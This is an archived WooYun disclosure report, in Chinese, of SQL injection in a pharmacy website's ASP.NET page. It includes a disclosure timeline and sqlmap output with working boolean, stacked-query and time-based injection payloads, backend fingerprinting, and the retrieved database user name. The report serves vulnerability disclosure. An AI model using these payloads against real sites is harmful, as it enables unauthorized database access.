乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-24: 细节已通知厂商并且等待厂商处理中 2015-12-24: 厂商已经确认,细节仅向厂商公开 2016-01-03: 细节向核心白帽子及相关领域专家公开 2016-01-13: 细节向普通白帽子公开 2016-01-23: 细节向实习白帽子公开 2016-02-07: 细节向公众公开
注入点:http://**.**.**.**/pharmacy/ContentAspx/ViewCotent.aspx?pk=15062300001&isClass=10&setTable=2两个参数都存在注入:
Place: GETParameter: pk Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pk=15062300001' AND 4124=4124 AND 'deoo'='deoo&isClass=10&setTable=2 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: pk=15062300001'; WAITFOR DELAY '0:0:5';-- AND 'iRlB'='iRlB&isClass=10&setTable=2 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: pk=15062300001' WAITFOR DELAY '0:0:5'-- AND 'fwlJ'='fwlJ&isClass=10&setTable=2Place: GETParameter: isClass Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pk=15062300001&isClass=10' AND 2928=2928 AND 'tIgd'='tIgd&setTable=2---there were multiple injection points, please select the one to use for following injections:[0] place: GET, parameter: pk, type: Single quoted string (default)[1] place: GET, parameter: isClass, type: Single quoted string[q] Quit>[15:54:27] [INFO] testing MySQL[15:54:28] [WARNING] the back-end DBMS is not MySQL[15:54:28] [INFO] testing Oracle[15:54:29] [WARNING] the back-end DBMS is not Oracle[15:54:29] [INFO] testing PostgreSQL[15:54:29] [WARNING] the back-end DBMS is not PostgreSQL[15:54:29] [INFO] testing Microsoft SQL Server[15:54:30] [INFO] confirming Microsoft SQL Server[15:54:32] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000[15:54:32] [INFO] fetching current user[15:54:32] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[15:54:32] [INFO] retrieved: mytsppcurrent user: 'mytspp'
危害等级:高
漏洞Rank:16
确认时间:2015-12-24 19:17
感謝通報
暂无